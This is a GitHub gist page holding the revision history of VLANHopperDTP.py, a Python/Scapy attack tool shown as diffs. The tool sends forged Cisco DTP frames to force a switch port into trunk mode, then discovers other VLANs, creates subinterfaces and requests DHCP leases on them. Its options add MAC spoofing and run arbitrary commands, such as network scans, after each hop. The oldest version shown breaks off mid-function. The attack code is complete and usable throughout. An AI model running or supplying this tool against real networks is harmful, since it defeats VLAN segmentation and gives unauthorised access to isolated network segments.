Skip to content

Instantly share code, notes, and snippets.

@kernelr00ter
Forked from mgeeky/VLANHopperDTP.py
Created March 5, 2025 20:27
Show Gist options
  • Save kernelr00ter/2d0f17549072b05870947eea0c0688dc to your computer and use it in GitHub Desktop.
Save kernelr00ter/2d0f17549072b05870947eea0c0688dc to your computer and use it in GitHub Desktop.

Revisions

  1. @mgeeky mgeeky revised this gist Feb 1, 2018. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -456,7 +456,7 @@ def sniffThread():

    if len(dtps) > 0 or config['force']:
    if len(dtps) > 0:
    Logger.info('Got {} DTP frames.\n'.format(
    Logger.dbg('Got {} DTP frames.\n'.format(
    len(dtps)
    ))
    else:
  2. @mgeeky mgeeky revised this gist Feb 1, 2018. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -496,7 +496,7 @@ def changeMacAddress(iface, mac):
    return ret

    def assure8021qCapabilities():
    if not ('not found' in shell('modprobe -n 8021q')):
    if ('not found' in shell('modprobe -n 8021q')):
    Logger.err('There is no kernel module named: "8021q". Fatal error.')
    return False

  3. @mgeeky mgeeky revised this gist Feb 1, 2018. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -496,7 +496,7 @@ def changeMacAddress(iface, mac):
    return ret

    def assure8021qCapabilities():
    if not ('8021q' in shell('lsmod | grep 8021q | head -1')):
    if not ('not found' in shell('modprobe -n 8021q')):
    Logger.err('There is no kernel module named: "8021q". Fatal error.')
    return False

  4. @mgeeky mgeeky revised this gist Jan 18, 2018. 1 changed file with 19 additions and 14 deletions.
    33 changes: 19 additions & 14 deletions VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -433,14 +433,19 @@ def sniffThread():
    ))

    while not stopThreads and not attackEngaged:
    dtps = sniff(
    count = config['count'],
    filter = 'ether[20:2] == 0x2004',
    timeout = config['timeout'],
    prn = packetCallback,
    stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
    iface = config['interface']
    )
    try:
    dtps = sniff(
    count = config['count'],
    filter = 'ether[20:2] == 0x2004',
    timeout = config['timeout'],
    prn = packetCallback,
    stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
    iface = config['interface']
    )
    except Exception as e:
    if 'Network is down' in str(e):
    break
    Logger.err('Exception occured during sniffing: ' + str(e))

    if len(dtps) == 0 and not warnOnce:
    Logger.fail('It seems like there was no DTP frames transmitted.')
    @@ -525,14 +530,14 @@ def selectDefaultInterface():
    return ''

    def cleanup():
    Logger.dbg('Launching cleanup commands...')
    launchCommands(subif, config['exitcommands'])

    Logger.dbg('Restoring original MAC address...')
    changeMacAddress(config['interface'], config['origmacaddr'])
    if config['origmacaddr'] != config['macaddr']:
    Logger.dbg('Restoring original MAC address...')
    changeMacAddress(config['interface'], config['origmacaddr'])

    for subif in subinterfaces:
    Logger.dbg('Removing subinterface: {}'.format(subif))

    launchCommands(subif, config['exitcommands'])
    shell('vconfig rem {}'.format(subif))

    Logger.dbg('Removing temporary files...')
    @@ -627,7 +632,7 @@ def main(argv):
    while True:
    pass
    except KeyboardInterrupt:
    Logger.info('\nStopping...')
    print('\n[>] Cleaning up...')

    stopThreads = True
    time.sleep(3)
  5. @mgeeky mgeeky revised this gist Jan 18, 2018. 1 changed file with 11 additions and 5 deletions.
    16 changes: 11 additions & 5 deletions VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -54,7 +54,8 @@
    'macaddr' : '',
    'inet' : '',
    'origmacaddr' : '',
    'commands' : []
    'commands' : [],
    'exitcommands' : [],
    }

    stopThreads = False
    @@ -352,11 +353,11 @@ def launchCommand(subif, cmd):
    if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
    if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep inet | awk '{print $2}' | cut -d/ -f2"))

    Logger.dbg('Command to launch: "{}"'.format(cmd))
    print('[>] Launching command: "{}"'.format(cmd))
    shell(cmd)

    def launchCommands(subif):
    for cmd in config['commands']:
    def launchCommands(subif, commands):
    for cmd in commands:
    launchCommand(subif, cmd)

    def addVlanIface(vlan):
    @@ -407,7 +408,7 @@ def addVlanIface(vlan):
    ret = True

    print('[+] Hopped to VLAN {}.: {}'.format(vlan, ip))
    launchCommands(subif)
    launchCommands(subif, config['commands'])
    break

    time.sleep(5)
    @@ -524,6 +525,9 @@ def selectDefaultInterface():
    return ''

    def cleanup():
    Logger.dbg('Launching cleanup commands...')
    launchCommands(subif, config['exitcommands'])

    Logger.dbg('Restoring original MAC address...')
    changeMacAddress(config['interface'], config['origmacaddr'])

    @@ -546,6 +550,7 @@ def parseOptions(argv):
    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
    parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
    parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
    parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
    parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
    @@ -560,6 +565,7 @@ def parseOptions(argv):
    config['force'] = args.force
    config['interface'] = args.interface
    config['commands'] = args.command
    config['exitcommands'] = args.exitcommand

    return args

  6. @mgeeky mgeeky revised this gist Jan 18, 2018. 1 changed file with 80 additions and 20 deletions.
    100 changes: 80 additions & 20 deletions VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -15,10 +15,7 @@
    # https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
    #
    # TODO:
    # - Add Analysis mode, skipping DHCP/IP address resolution and subinterface creation
    # - Add logic that falls back to static IP address setup when DHCP fails
    # - Add functionality to temporarily change interface's MAC address
    # - Add option to launch custom script/program after hopping to VLAN (like some ARP/ICMP/DHCP Spoofing tools)
    # - Possibly implement custom ARP/ICMP/DHCP spoofers
    #
    # Mariusz B. / mgeeky, '18
    @@ -36,19 +33,28 @@
    import fcntl, socket, struct

    from ctypes import *
    from scapy.all import *

    VERSION = '0.2'
    try:
    from scapy.all import *
    except ImportError:
    print('[!] Scapy required: pip install scapy')
    sys.exit(1)


    VERSION = '0.3'

    config = {
    'verbose' : False,
    'debug' : False,
    'force' : False,
    'count' : 10,
    'timeout' : 90,
    'analyse' : False,
    'interface' : '',
    'macaddr' : '',
    'inet' : '',
    'origmacaddr' : '',
    'commands' : []
    }

    stopThreads = False
    @@ -209,7 +215,6 @@ def inspectPacket(dtp):
    break

    ret = True

    if stat == -1:
    Logger.fail('Something went wrong: Got invalid DTP packet.')
    ret = False
    @@ -296,9 +301,12 @@ def engageDot1qSniffer():
    print('==> VLAN discovered: {}'.format(dot1q))
    vlansHijacked.add(dot1q)

    t = threading.Thread(target = addVlanIface, args = (dot1q, ))
    t.daemon = True
    t.start()
    if not config['analyse']:
    t = threading.Thread(target = addVlanIface, args = (dot1q, ))
    t.daemon = True
    t.start()
    else:
    Logger.info('Analysis mode: Did not go any further.')

    Logger.info('Stopped VLAN/802.1Q sniffer.')

    @@ -329,6 +337,28 @@ def processDtps(dtps):
    if attackEngaged:
    engageDot1qSniffer()

    def launchCommand(subif, cmd):
    # following placeholders in command:
    # $GW (gateway),
    # $MASK (full mask),

    Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))

    if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
    if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
    if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
    if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
    if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
    if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
    if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep inet | awk '{print $2}' | cut -d/ -f2"))

    Logger.dbg('Command to launch: "{}"'.format(cmd))
    shell(cmd)

    def launchCommands(subif):
    for cmd in config['commands']:
    launchCommand(subif, cmd)

    def addVlanIface(vlan):
    global subinterfaces
    global tempfiles
    @@ -377,6 +407,7 @@ def addVlanIface(vlan):
    ret = True

    print('[+] Hopped to VLAN {}.: {}'.format(vlan, ip))
    launchCommands(subif)
    break

    time.sleep(5)
    @@ -441,6 +472,23 @@ def getIfaceIP(iface):
    Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
    return out

    def changeMacAddress(iface, mac):
    old = getHwAddr(iface)
    Logger.dbg('Changing MAC address of interface {}, from: {} to: {}'.format(
    iface, old, mac
    ))
    shell('ifconfig {} down'.format(iface))
    shell('ifconfig {} hw ether {}'.format(iface, mac))
    shell('ifconfig {} up'.format(iface))

    ret = old != getHwAddr(iface)
    if ret:
    Logger.dbg('Changed.')
    else:
    Logger.dbg('Not changed.')

    return ret

    def assure8021qCapabilities():
    if not ('8021q' in shell('lsmod | grep 8021q | head -1')):
    Logger.err('There is no kernel module named: "8021q". Fatal error.')
    @@ -476,6 +524,9 @@ def selectDefaultInterface():
    return ''

    def cleanup():
    Logger.dbg('Restoring original MAC address...')
    changeMacAddress(config['interface'], config['origmacaddr'])

    for subif in subinterfaces:
    Logger.dbg('Removing subinterface: {}'.format(subif))
    shell('vconfig rem {}'.format(subif))
    @@ -494,20 +545,21 @@ def parseOptions(argv):

    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
    parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
    parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
    parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    if len(argv) < 2:
    parser.print_help()
    return False

    args = parser.parse_args()

    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['analyse'] = args.analyse
    config['force'] = args.force
    config['interface'] = args.interface
    config['commands'] = args.command

    return args

    @@ -519,11 +571,13 @@ def main(argv):
    if not opts:
    Logger.err('Options parsing failed.')
    return False

    if os.getuid() != 0:
    Logger.err('This program must be run as root.')
    return False

    load_contrib('dtp')

    if not assure8021qCapabilities():
    Logger.err('Unable to proceed.')
    return False
    @@ -533,9 +587,9 @@ def main(argv):
    Logger.err('Could not find suitable interface. Please specify it.')
    return False

    Logger.info('Interface to work on: "{}"'.format(config['interface']))
    print('[>] Interface to work on: "{}"'.format(config['interface']))

    config['macaddr'] = getHwAddr(config['interface'])
    config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
    if not config['macaddr']:
    Logger.err('Could not acquire MAC address of interface: "{}"'.format(
    config['interface']
    @@ -548,10 +602,16 @@ def main(argv):

    config['inet'] = getIfaceIP(config['interface'])
    if not config['inet']:
    Logger.err('Could not acquire interface\'s IP address!')
    return ''

    load_contrib('dtp')
    Logger.fail('Could not acquire interface\'s IP address! Proceeding...')

    oldMac = config['macaddr']
    if opts.mac:
    oldMac = changeMacAddress(config['interface'], opts.mac)
    if oldMac:
    config['macaddr'] = opts.mac
    else:
    Logger.err('Could not change interface\'s MAC address!')
    return False

    t = threading.Thread(target = sniffThread)
    t.daemon = True
  7. @mgeeky mgeeky revised this gist Jan 17, 2018. 1 changed file with 12 additions and 7 deletions.
    19 changes: 12 additions & 7 deletions VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -15,7 +15,11 @@
    # https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
    #
    # TODO:
    # -
    # - Add Analysis mode, skipping DHCP/IP address resolution and subinterface creation
    # - Add logic that falls back to static IP address setup when DHCP fails
    # - Add functionality to temporarily change interface's MAC address
    # - Add option to launch custom script/program after hopping to VLAN (like some ARP/ICMP/DHCP Spoofing tools)
    # - Possibly implement custom ARP/ICMP/DHCP spoofers
    #
    # Mariusz B. / mgeeky, '18
    #
    @@ -34,6 +38,7 @@
    from ctypes import *
    from scapy.all import *

    VERSION = '0.2'

    config = {
    'verbose' : False,
    @@ -484,8 +489,8 @@ def parseOptions(argv):
    :: VLAN Hopping via DTP Trunk negotiation
    Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
    Mariusz B. / mgeeky, '18
    v0.2
    ''')
    v{}
    '''.format(VERSION))

    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    @@ -510,14 +515,14 @@ def main(argv):
    global config
    global stopThreads

    if os.getuid() != 0:
    Logger.err('[!] This program must be run as root.')
    return False

    opts = parseOptions(argv)
    if not opts:
    Logger.err('Options parsing failed.')
    return False

    if os.getuid() != 0:
    Logger.err('This program must be run as root.')
    return False

    if not assure8021qCapabilities():
    Logger.err('Unable to proceed.')
  8. @mgeeky mgeeky revised this gist Jan 17, 2018. 1 changed file with 100 additions and 38 deletions.
    138 changes: 100 additions & 38 deletions VLANHopperDTP.py
    Original file line number Diff line number Diff line change
    @@ -14,6 +14,9 @@
    # This program uses code written by 'floodlight', which comes from here:
    # https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
    #
    # TODO:
    # -
    #
    # Mariusz B. / mgeeky, '18
    #

    @@ -22,8 +25,9 @@
    import socket
    import struct
    import argparse
    import threading
    import tempfile
    import commands
    import threading
    import subprocess
    import fcntl, socket, struct

    @@ -34,6 +38,7 @@
    config = {
    'verbose' : False,
    'debug' : False,
    'force' : False,
    'count' : 10,
    'timeout' : 90,
    'interface' : '',
    @@ -43,10 +48,13 @@

    stopThreads = False
    attackEngaged = False
    dot1qSnifferStarted = False

    vlansHijacked = set()
    subinterfaces = set()

    tempfiles = []


    #
    # ===============================================
    @@ -226,6 +234,9 @@ def inspectPacket(dtp):
    Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
    print('[?] VLAN Hopping may be possible.')

    if ret:
    print('[>] After Hopping to other VLANs - leave this program running to maintain connections.')

    return ret

    def floodTrunkingRequests():
    @@ -254,6 +265,38 @@ def floodTrunkingRequests():

    time.sleep(30)

    def engageDot1qSniffer():
    global dot1qSnifferStarted

    if dot1qSnifferStarted:
    return

    dot1qSnifferStarted = True

    Logger.info('Starting VLAN/802.1Q sniffer.')

    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((config['interface'], ETH_P_ALL))
    enable_auxdata(sock)

    print('[>] Discovering new VLANs...')

    while not stopThreads:
    buf = recv(sock, 65535)
    pkt = Ether(buf)

    if pkt.haslayer(Dot1Q):
    dot1q = pkt.vlan
    if dot1q not in vlansHijacked:
    print('==> VLAN discovered: {}'.format(dot1q))
    vlansHijacked.add(dot1q)

    t = threading.Thread(target = addVlanIface, args = (dot1q, ))
    t.daemon = True
    t.start()

    Logger.info('Stopped VLAN/802.1Q sniffer.')

    def processDtps(dtps):
    global attackEngaged

    @@ -277,9 +320,19 @@ def processDtps(dtps):

    attackEngaged = True
    time.sleep(5)

    if attackEngaged:
    engageDot1qSniffer()

    def addVlanIface(vlan):
    global subinterfaces
    global tempfiles

    subif = '{}.{}'.format(config['interface'], vlan)

    if subif in subinterfaces:
    Logger.fail('Already created that subinterface: {}'.format(subif))
    return

    Logger.info('Creating new VLAN Subinterface for {}.'.format(vlan))

    @@ -288,18 +341,28 @@ def addVlanIface(vlan):
    ))

    if out.startswith('Added VLAN with VID == {}'.format(vlan)):
    subif = '{}.{}'.format(config['interface'], vlan)

    Logger.ok('Succeeded.')
    subinterfaces.add(subif)

    pidFile = tempfile.NamedTemporaryFile().name
    dbFile = tempfile.NamedTemporaryFile().name

    tempfiles.append(pidFile)
    tempfiles.append(dbFile)

    Logger.info('So far so good, subinterface {} added.'.format(subif))

    ret = False
    for attempt in range(3):
    Logger.dbg('Acquiring DHCP lease for {}'.format(subif))

    shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
    time.sleep(3)
    shell('dhclient -r {}'.format(subif))
    time.sleep(5)
    shell('dhclient {}'.format(subif))

    if attempt > 0:
    shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
    time.sleep(3)

    shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))

    time.sleep(3)
    ip = getIfaceIP(subif)
    @@ -311,6 +374,8 @@ def addVlanIface(vlan):
    print('[+] Hopped to VLAN {}.: {}'.format(vlan, ip))
    break

    time.sleep(5)

    if not ret:
    Logger.fail('Could not acquire DHCP lease for: {}'.format(subif))
    Logger.fail('Skipping...')
    @@ -343,40 +408,22 @@ def sniffThread():
    if len(dtps) == 0 and not warnOnce:
    Logger.fail('It seems like there was no DTP frames transmitted.')
    Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
    Logger.info('\n\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
    Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
    Logger.info('\tSWITCH(config-if)# switchport mode access')
    Logger.info('\nWill continue scanning...')
    warnOnce = True

    else:
    Logger.info('Got {} DTP frames.\n'.format(
    len(dtps)
    ))
    if len(dtps) > 0 or config['force']:
    if len(dtps) > 0:
    Logger.info('Got {} DTP frames.\n'.format(
    len(dtps)
    ))
    else:
    Logger.info('Forced mode: Beginning attack blindly.')

    t = threading.Thread(target = processDtps, args = (dtps, ))
    t.daemon = True
    t.start()

    Logger.info('Starting VLAN/802.1Q sniffer.')

    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((config['interface'], ETH_P_ALL))
    enable_auxdata(sock)

    while not stopThreads:
    buf = recv(sock, 65535)
    pkt = Ether(buf)

    if pkt.haslayer(Dot1Q):
    dot1q = pkt.vlan
    if dot1q not in vlansHijacked:
    print('==> VLAN discovered: {}'.format(dot1q))
    vlansHijacked.add(dot1q)

    t = threading.Thread(target = addVlanIface, args = (dot1q, ))
    t.daemon = True
    t.start()

    Logger.dbg('Stopped sniffing.')

    def getHwAddr(ifname):
    @@ -423,9 +470,26 @@ def selectDefaultInterface():

    return ''

    def cleanup():
    for subif in subinterfaces:
    Logger.dbg('Removing subinterface: {}'.format(subif))
    shell('vconfig rem {}'.format(subif))

    Logger.dbg('Removing temporary files...')
    for file in tempfiles:
    os.remove(file)

    def parseOptions(argv):
    print('''
    :: VLAN Hopping via DTP Trunk negotiation
    Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
    Mariusz B. / mgeeky, '18
    v0.2
    ''')

    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')

    @@ -437,6 +501,7 @@ def parseOptions(argv):

    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['force'] = args.force
    config['interface'] = args.interface

    return args
    @@ -491,15 +556,12 @@ def main(argv):
    while True:
    pass
    except KeyboardInterrupt:
    Logger.info('Stopping...')
    Logger.info('\nStopping...')

    stopThreads = True
    time.sleep(3)

    for subif in subinterfaces:
    Logger.dbg('Removing subinterface: {}'.format(subif))
    shell('vconfig rem {}'.format(subif))

    cleanup()
    return True

    if __name__ == '__main__':
  9. @mgeeky mgeeky renamed this gist Jan 17, 2018. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  10. @mgeeky mgeeky revised this gist Jan 17, 2018. 1 changed file with 3 additions and 2 deletions.
    5 changes: 3 additions & 2 deletions DTPVLANHopper.py
    Original file line number Diff line number Diff line change
    @@ -281,17 +281,18 @@ def processDtps(dtps):
    def addVlanIface(vlan):
    global subinterfaces

    Logger.info('Creating new VLAN Subinterface for {}'.format(vlan))
    Logger.info('Creating new VLAN Subinterface for {}.'.format(vlan))

    out = shell('vconfig add {} {}'.format(
    config['interface'], vlan
    ))

    if out.startswith('Added VLAN with VID == {}'.format(vlan)):
    subif = '{}.{}'.format(config['interface'], vlan)

    Logger.ok('Succeeded.')
    subinterfaces.add(subif)

    subif = '{}.{}'.format(config['interface'], vlan)
    ret = False
    for attempt in range(3):
    Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
  11. @mgeeky mgeeky created this gist Jan 17, 2018.
    505 changes: 505 additions & 0 deletions DTPVLANHopper.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,505 @@
    #!/usr/bin/python

    #
    # This script is performing DTP Trunk mode detection and VLAN Hopping
    # attack automatically, running sniffer afterwards to collect any other
    # VLAN available. To be launched only in Unix/Linux environment as the
    # script utilizes following applications:
    # - 8021q.ko
    # - vconfig
    # - ifconfig / ip / route
    # - dhclient
    #
    # NOTICE:
    # This program uses code written by 'floodlight', which comes from here:
    # https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
    #
    # Mariusz B. / mgeeky, '18
    #

    import os
    import sys
    import socket
    import struct
    import argparse
    import threading
    import commands
    import subprocess
    import fcntl, socket, struct

    from ctypes import *
    from scapy.all import *


    config = {
    'verbose' : False,
    'debug' : False,
    'count' : 10,
    'timeout' : 90,
    'interface' : '',
    'macaddr' : '',
    'inet' : '',
    }

    stopThreads = False
    attackEngaged = False

    vlansHijacked = set()
    subinterfaces = set()


    #
    # ===============================================
    # Floodlight's afpacket definitions
    #

    ETH_P_8021Q = 0x8100
    SOL_PACKET = 263
    PACKET_AUXDATA = 8
    TP_STATUS_VLAN_VALID = 1 << 4

    class struct_iovec(Structure):
    _fields_ = [
    ("iov_base", c_void_p),
    ("iov_len", c_size_t),
    ]

    class struct_msghdr(Structure):
    _fields_ = [
    ("msg_name", c_void_p),
    ("msg_namelen", c_uint32),
    ("msg_iov", POINTER(struct_iovec)),
    ("msg_iovlen", c_size_t),
    ("msg_control", c_void_p),
    ("msg_controllen", c_size_t),
    ("msg_flags", c_int),
    ]

    class struct_cmsghdr(Structure):
    _fields_ = [
    ("cmsg_len", c_size_t),
    ("cmsg_level", c_int),
    ("cmsg_type", c_int),
    ]

    class struct_tpacket_auxdata(Structure):
    _fields_ = [
    ("tp_status", c_uint),
    ("tp_len", c_uint),
    ("tp_snaplen", c_uint),
    ("tp_mac", c_ushort),
    ("tp_net", c_ushort),
    ("tp_vlan_tci", c_ushort),
    ("tp_padding", c_ushort),
    ]

    libc = CDLL("libc.so.6")
    recvmsg = libc.recvmsg
    recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
    recvmsg.retype = c_int

    def enable_auxdata(sk):
    """
    Ask the kernel to return the VLAN tag in a control message
    Must be called on the socket before afpacket.recv.
    """
    sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)

    def recv(sk, bufsize):
    """
    Receive a packet from an AF_PACKET socket
    @sk Socket
    @bufsize Maximum packet size
    """
    buf = create_string_buffer(bufsize)

    ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
    ctrl_buf = create_string_buffer(ctrl_bufsize)

    iov = struct_iovec()
    iov.iov_base = cast(buf, c_void_p)
    iov.iov_len = bufsize

    msghdr = struct_msghdr()
    msghdr.msg_name = None
    msghdr.msg_namelen = 0
    msghdr.msg_iov = pointer(iov)
    msghdr.msg_iovlen = 1
    msghdr.msg_control = cast(ctrl_buf, c_void_p)
    msghdr.msg_controllen = ctrl_bufsize
    msghdr.msg_flags = 0

    rv = recvmsg(sk.fileno(), byref(msghdr), 0)
    if rv < 0:
    raise RuntimeError("recvmsg failed: rv=%d", rv)

    # The kernel only delivers control messages we ask for. We
    # only enabled PACKET_AUXDATA, so we can assume it's the
    # only control message.
    assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)

    cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
    assert cmsghdr.cmsg_level == SOL_PACKET
    assert cmsghdr.cmsg_type == PACKET_AUXDATA

    auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101

    if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
    # Insert VLAN tag
    tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
    return buf.raw[:12] + tag + buf.raw[12:rv]
    else:
    return buf.raw[:rv]

    #
    # ===============================================
    #

    class Logger:
    @staticmethod
    def _out(x):
    if config['debug'] or config['verbose']:
    sys.stdout.write(x + '\n')

    @staticmethod
    def dbg(x):
    if config['debug']:
    sys.stdout.write('[dbg] ' + x + '\n')

    @staticmethod
    def out(x):
    Logger._out('[.] ' + x)

    @staticmethod
    def info(x):
    Logger._out('[?] ' + x)

    @staticmethod
    def err(x):
    sys.stdout.write('[!] ' + x + '\n')

    @staticmethod
    def fail(x):
    Logger._out('[-] ' + x)

    @staticmethod
    def ok(x):
    Logger._out('[+] ' + x)

    def inspectPacket(dtp):
    tlvs = dtp['DTP'].tlvlist
    stat = -1
    for tlv in tlvs:
    if tlv.type == 2:
    stat = ord(tlv.status)
    break

    ret = True

    if stat == -1:
    Logger.fail('Something went wrong: Got invalid DTP packet.')
    ret = False

    elif stat == 2:
    Logger.fail('DTP disabled, Switchport in Access mode configuration')
    print('[!] VLAN Hopping is not possible.')
    ret = False

    elif stat == 3:
    Logger.ok('DTP enabled, Switchport in default configuration')
    print('[+] VLAN Hopping is possible.')

    elif stat == 4 or stat == 0x84:
    Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
    print('[+] VLAN Hopping is possible.')

    elif stat == 0x81:
    Logger.ok('DTP enabled, Switchport in Trunk configuration')
    print('[+] VLAN Hopping IS possible.')

    elif stat == 0xa5:
    Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
    print('[?] VLAN Hopping may be possible.')

    elif stat == 0x42:
    Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
    print('[?] VLAN Hopping may be possible.')

    return ret

    def floodTrunkingRequests():
    while not stopThreads:
    # Ethernet
    dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)

    # Logical-Link Control
    llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)

    # OUT = Cisco, Code = DTP
    snap = SNAP(OUI = 0x0c, code = 0x2004)

    # DTP, Status = Access/Desirable (3), Type: Trunk (3)
    dtp = DTP(ver = 1, tlvlist = [
    DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'),
    DTPStatus(status = '\\x03', length = 5, type = 2),
    DTPType(length = 5, type = 3, dtptype = '\\xa5'),
    DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
    ])

    frame = dot3 / llc / snap / dtp

    Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
    send(frame, iface = config['interface'], verbose = False)

    time.sleep(30)

    def processDtps(dtps):
    global attackEngaged

    if stopThreads: return

    if attackEngaged == False:
    success = False
    for dtp in dtps:
    if dtp.haslayer(DTP):
    if inspectPacket(dtp):
    success = True
    break

    if success:
    Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
    Logger.ok('Flooding with fake Access/Desirable DTP frames...\n')

    t = threading.Thread(target = floodTrunkingRequests)
    t.daemon = True
    t.start()

    attackEngaged = True
    time.sleep(5)

    def addVlanIface(vlan):
    global subinterfaces

    Logger.info('Creating new VLAN Subinterface for {}'.format(vlan))

    out = shell('vconfig add {} {}'.format(
    config['interface'], vlan
    ))

    if out.startswith('Added VLAN with VID == {}'.format(vlan)):
    Logger.ok('Succeeded.')
    subinterfaces.add(subif)

    subif = '{}.{}'.format(config['interface'], vlan)
    ret = False
    for attempt in range(3):
    Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
